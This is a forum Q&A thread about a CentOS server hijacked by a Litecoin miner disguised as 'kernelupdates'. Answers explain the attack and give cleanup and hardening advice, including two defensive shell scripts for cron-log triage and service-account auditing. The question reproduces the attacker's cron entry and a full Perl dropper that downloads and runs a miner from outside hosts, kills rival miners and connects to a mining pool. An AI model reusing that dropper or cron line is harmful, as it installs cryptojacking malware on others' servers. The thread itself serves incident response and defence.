./kernelupdates 100% cpu usage

I have a CentOS 6 server running some WordPress & Tomcat websites. In the last two days it has been crashing continuously. After investigation we found the kernelupdates binary consuming 100% CPU on the server. The process is mentioned below.

./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

But this process does not seem to be a valid kernel update. The server might be compromised and this process installed by a hacker, so I've killed this process & removed the apache user's cron entries.

But somehow this process started again after a couple of hours & the cron entries were also restored. I am searching for the thing that is modifying the cron jobs.

  1. Is this process a mining process?
  2. How can we stop the cronjob modification and clean out the source of this process?

Cron entry (apache user)

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*

abc.txt

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) {
$rn=int(rand(11));
}
$exists=`ls /tmp/.ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelupdates/gi) { die; }
if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig>6)) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
print "done!\n";

This process is a Litecoin (an alternative cryptocurrency) miner process. Someone with access to your server is using your server to generate Litecoins (= make money). The kernelupdates name is very likely just there to confuse you.

Before you remove anything I would recommend making a backup of everything you have and finding out how this was put onto your server. If you remove it but don't remove the security issue, it is very likely to come back. I would bet on WordPress or some outdated plugin being the security hole.

After finding and of course fixing the security issue, try looking at your cron logs in the syslog. This might give you an indication of how the cronjob is inserted.
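One way to act on that suggestion, as an added example that is not part of the answer above: a small POSIX shell triage of /var/log/cron (where CentOS 6 writes cron's syslog facility) that finds when the apache user's crontab was first installed and how many download-and-run jobs executed. The log lines are a constructed sample in the format cronie/vixie-cron use (`crontab[pid]: (user) REPLACE (user)` when crontab(1) installs a table, `CROND[pid]: (user) CMD (...)` when a job runs); the function names are my own. The timestamp of the first REPLACE is the moment to look up in the web server access log, because the request that planted the crontab arrived seconds before it.

```shell
#!/bin/sh
# Added example: triage of the cron log for the pattern in this thread.
# Constructed sample in the format CentOS 6 cron writes to /var/log/cron:
#   "crontab[pid]: (user) REPLACE (user)" when crontab(1) installs a table,
#   "CROND[pid]: (user) CMD (command)"    when a job runs.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Mar 10 11:59:01 web1 CROND[4122]: (root) CMD (run-parts /etc/cron.hourly)
Mar 10 12:03:41 web1 crontab[4190]: (apache) REPLACE (apache)
Mar 10 12:06:01 web1 CROND[4211]: (apache) CMD (cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*)
Mar 10 12:12:01 web1 CROND[4260]: (apache) CMD (cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*)
Mar 10 12:20:01 web1 CROND[4301]: (root) CMD (/usr/lib64/sa/sa1 1 1)
EOF

# first_install_time LOG USER: timestamp of the first time USER's crontab was
# installed or replaced; empty if it never was. Correlate it with the access log.
first_install_time() {
    grep -E "crontab\[[0-9]+\]: \($2\) REPLACE " "$1" | head -n 1 | awk '{print $1, $2, $3}'
}

# suspicious_job_count LOG USER: number of USER's job runs that changed into
# /tmp and fetched something with wget or curl, the download-and-run shape above.
suspicious_job_count() {
    grep -E "CROND\[[0-9]+\]: \($2\) CMD \(" "$1" \
        | grep -E '(wget|curl) +(-O +)?https?://' \
        | grep -c 'cd /tmp' || true
}

# Stand-alone run against the sample; set CRON_LOG=/var/log/cron on a real box.
CRON_LOG=${CRON_LOG:-$SAMPLE_LOG}
echo "apache crontab first installed: $(first_install_time "$CRON_LOG" apache)"
echo "apache download-and-run jobs:  $(suspicious_job_count "$CRON_LOG" apache)"
echo "root download-and-run jobs:    $(suspicious_job_count "$CRON_LOG" root)"
```

Note that single-digit days are padded with two spaces in syslog timestamps, which is why the timestamp is taken with awk rather than a fixed-width cut.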


I was just compromised by this on my server. I can see in my logs that I was being hit on an old WordPress site, and then seconds later they had the cron jobs running over and over. Interestingly, I've had this site for quite some time now, and it only happened when I changed over to nginx and php-fpm; is your setup the same?

I'm hoping that all that happened is that they were able to install these cron jobs through a vulnerability in PHP/WordPress. Basically they:

  • Got shell access and executed crontab -e to get the cron jobs firing
  • The cron job puts the script in /tmp/abc.txt.1 and executes it
  • The script downloads the Litecoin miner into /etc/.ice-unix, renames it kernelupdates and starts it
  • They ensure that the miner stays put from there by firing that cron job over and over

Also note that the Litecoin username varies slightly, between spdrman.2 and spdrman.10.

One more thing: please check /etc/passwd for your apache user. I had its shell stupidly set to /bin/bash; this is probably safer set to /bin/false.

Also, if possible, ensure that your apache user cannot execute commands like crontab, wget, or curl, to stop this from happening again. Those commands seem to be at the core of what they did when they got in.

As a precaution I'm changing my SSH port again. I've double-checked that I've set PermitRootLogin no in the sshd settings, so I'm pretty sure they couldn't have gotten in directly as root.
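The shell, crontab and leftover-spool-file part of that advice, turned into an audit-then-fix script that rehearses against a copy of the relevant files, as an added example rather than anything from the answer above. The function names and the sample tree under a temporary directory are my own construction; the sample reproduces the weak state described in the thread (apache with /bin/bash as its shell, no /etc/cron.allow, a crontab still present in /var/spool/cron). The commands for a live system are given in the comments; the script itself only edits the copy it is pointed at.

```shell
#!/bin/sh
# Added example: audit and fix the apache service account after a crontab-based
# miner. Works on a directory tree (ROOT) so it can be rehearsed offline; the
# live-system equivalents of each fix are in the comments.

# make_sample_tree: constructed copy of the weak state from this thread.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/etc" "$t/var/spool/cron"
    cat > "$t/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/bash
EOF
    # A table left in the spool keeps running even after the shell is locked.
    echo '*/6 * * * * cd /tmp;perl abc.txt' > "$t/var/spool/cron/apache"
    echo "$t"
}

# audit_service_account ROOT USER: print one finding per line; return the count.
audit_service_account() {
    root=$1; user=$2; n=0
    shell=$(awk -F: -v u="$user" '$1 == u { print $7 }' "$root/etc/passwd")
    case "$shell" in
        /sbin/nologin|/bin/false) ;;
        *) echo "$user has login shell '$shell'"; n=$((n + 1)) ;;
    esac
    # crontab(1): if /etc/cron.allow exists, only the users listed in it may use it.
    if [ ! -f "$root/etc/cron.allow" ]; then
        echo "no /etc/cron.allow, any user may install a crontab"; n=$((n + 1))
    elif grep -qx "$user" "$root/etc/cron.allow"; then
        echo "$user is listed in /etc/cron.allow"; n=$((n + 1))
    fi
    # cron.allow does not remove a table that is already installed.
    if [ -f "$root/var/spool/cron/$user" ]; then
        echo "crontab still installed for $user in /var/spool/cron"; n=$((n + 1))
    fi
    return $n
}

# harden_service_account ROOT USER: apply the three fixes to the tree.
harden_service_account() {
    root=$1; user=$2
    # Live system: usermod -s /sbin/nologin "$user"
    awk -F: -v OFS=: -v u="$user" '$1 == u { $7 = "/sbin/nologin" } { print }' \
        "$root/etc/passwd" > "$root/etc/passwd.tmp" && mv "$root/etc/passwd.tmp" "$root/etc/passwd"
    # Live system: echo root > /etc/cron.allow  (crontab then refuses every other user)
    echo root > "$root/etc/cron.allow"
    # Live system: keep a copy for the investigation, then crontab -r -u "$user"
    if [ -f "$root/var/spool/cron/$user" ]; then
        cp "$root/var/spool/cron/$user" "$root/$user.crontab.evidence"
        rm -f "$root/var/spool/cron/$user"
    fi
}

# Stand-alone run: audit the weak sample, fix it, audit again.
ROOT=$(make_sample_tree)
n=0; audit_service_account "$ROOT" apache || n=$?; echo "findings before: $n"
harden_service_account "$ROOT" apache
n=0; audit_service_account "$ROOT" apache || n=$?; echo "findings after: $n"
rm -rf "$ROOT"
```

A caveat on the idea of blocking wget and curl for the apache user: a locked shell and cron.allow stop this particular persistence mechanism, but the initial code execution came through PHP, which can fetch and write files on its own; the fix that actually closes the door is patching the WordPress site and its plugins, as the first answer says.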